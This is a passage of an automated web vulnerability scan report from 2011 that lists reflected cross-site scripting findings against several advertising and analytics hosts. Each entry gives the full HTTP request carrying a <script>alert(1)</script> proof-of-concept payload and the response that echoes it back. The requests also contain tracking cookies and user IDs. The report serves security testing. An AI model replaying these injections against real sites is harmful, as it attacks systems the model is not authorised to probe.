PRpc=|FW9qGLZC:1|FW9nGLZC:1|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:39:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1278576' src='http://ads.pointroll.com/PortalServe/?pid=1278576G80420110421221132&cid=1472985&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b02/3/0/*/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B~sscs=%3F$CTURL$&time=1|10:39|-58667f";alert(1)//4dd79ad4bda&r=0.699075760319829&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.38. http://api-public.addthis.com/url/shares.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-public.addthis.com
Path:   /url/shares.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload fcecc<script>alert(1)</script>6208431cf82 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url/shares.json?url=http%3A%2F%2Fwww.csmonitor.com%2FBusiness%2F2011%2F0509%2FGas-prices-start-to-head-down&callback=_ate.cbs.sc_httpwwwcsmonitorcomBusiness20110509Gaspricesstarttoheaddownfcecc<script>alert(1)</script>6208431cf82 HTTP/1.1
Host: api-public.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1304951889.1FE|1304955482.1OD|1304951889.60; uid=4dab4fa85facd099; psc=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=300
Content-Type: application/javascript;charset=UTF-8
Date: Mon, 09 May 2011 15:39:18 GMT
Content-Length: 127
Connection: close

_ate.cbs.sc_httpwwwcsmonitorcomBusiness20110509Gaspricesstarttoheaddownfcecc<script>alert(1)</script>6208431cf82({"shares":1});

2.39. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 581d3<script>alert(1)</script>f2d9ac3c949 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction581d3<script>alert(1)</script>f2d9ac3c949&n=ar_int_p97174789&1304955333231 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:22 2011&prad=253732017&arc=194941149&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304955323%2E101%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:34 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction581d3<script>alert(1)</script>f2d9ac3c949("");

2.40. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload b98a4<script>alert(1)</script>65268a8432b was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7b98a4<script>alert(1)</script>65268a8432b&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=873164 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 15:35:01 GMT
Date: Mon, 09 May 2011 15:35:01 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7b98a4<script>alert(1)</script>65268a8432b", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.41. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 875cb<script>alert(1)</script>e60512b0d49 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=875cb<script>alert(1)</script>e60512b0d49&tm=873164 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 15:35:03 GMT
Date: Mon, 09 May 2011 15:35:03 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"875cb<script>alert(1)</script>e60512b0d49", c16:"", r:""});



2.42. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 1f594<script>alert(1)</script>f2857c8a3bb was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=59648881f594<script>alert(1)</script>f2857c8a3bb&c3=2&c4=&c5=&c6=&c15=&tm=873164 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 15:35:01 GMT
Date: Mon, 09 May 2011 15:35:01 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"59648881f594<script>alert(1)</script>f2857c8a3bb", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.43. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 6a371<script>alert(1)</script>d37c0203cc4 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=26a371<script>alert(1)</script>d37c0203cc4&c4=&c5=&c6=&c15=&tm=873164 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 15:35:02 GMT
Date: Mon, 09 May 2011 15:35:02 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"26a371<script>alert(1)</script>d37c0203cc4", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.44. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 98da8<script>alert(1)</script>ccf069095d5 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=98da8<script>alert(1)</script>ccf069095d5&c5=&c6=&c15=&tm=873164 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 15:35:02 GMT
Date: Mon, 09 May 2011 15:35:02 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"98da8<script>alert(1)</script>ccf069095d5", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.45. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 5f82e<script>alert(1)</script>3aa7d9dfcd8 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=5f82e<script>alert(1)</script>3aa7d9dfcd8&c6=&c15=&tm=873164 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 15:35:03 GMT
Date: Mon, 09 May 2011 15:35:03 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"5f82e<script>alert(1)</script>3aa7d9dfcd8", c6:"", c10:"", c15:"", c16:"", r:""});



2.46. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 631f9<script>alert(1)</script>452333e2e19 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=631f9<script>alert(1)</script>452333e2e19&c15=&tm=873164 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 15:35:03 GMT
Date: Mon, 09 May 2011 15:35:03 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"631f9<script>alert(1)</script>452333e2e19", c10:"", c15:"", c16:"", r:""});



2.47. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f90"><script>alert(1)</script>1920f1c3f9d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader20f90"><script>alert(1)</script>1920f1c3f9d/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI|U107OK; PizzaHut=ZapTrader; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:32 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 393
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader20f90"><script>alert(1)</script>1920f1c3f9d/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada/1779262043/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

2.48. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25f2a"><script>alert(1)</script>656d0189602 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT25f2a"><script>alert(1)</script>656d0189602/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI|U107OK; PizzaHut=ZapTrader; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:34 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 392
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT25f2a"><script>alert(1)</script>656d0189602/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada/464140654/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

2.49. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19e49"><script>alert(1)</script>80037391578 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired19e49"><script>alert(1)</script>80037391578/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI|U107OK; PizzaHut=ZapTrader; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 393
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired19e49"><script>alert(1)</script>80037391578/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada/1948118371/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

2.50. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aee35"><script>alert(1)</script>dbb7e18ef46 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-Legacyaee35"><script>alert(1)</script>dbb7e18ef46/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI|U107OK; PizzaHut=ZapTrader; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 393
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-Legacyaee35"><script>alert(1)</script>dbb7e18ef46/All/14a155dda-808a-4648-a03d-f65de2ef0ada/1351597883/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

2.51. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46703"><script>alert(1)</script>3613c51ffe3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-Legacy/All46703"><script>alert(1)</script>3613c51ffe3/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 HTTP/1.1
Host: b3.mookie1.com
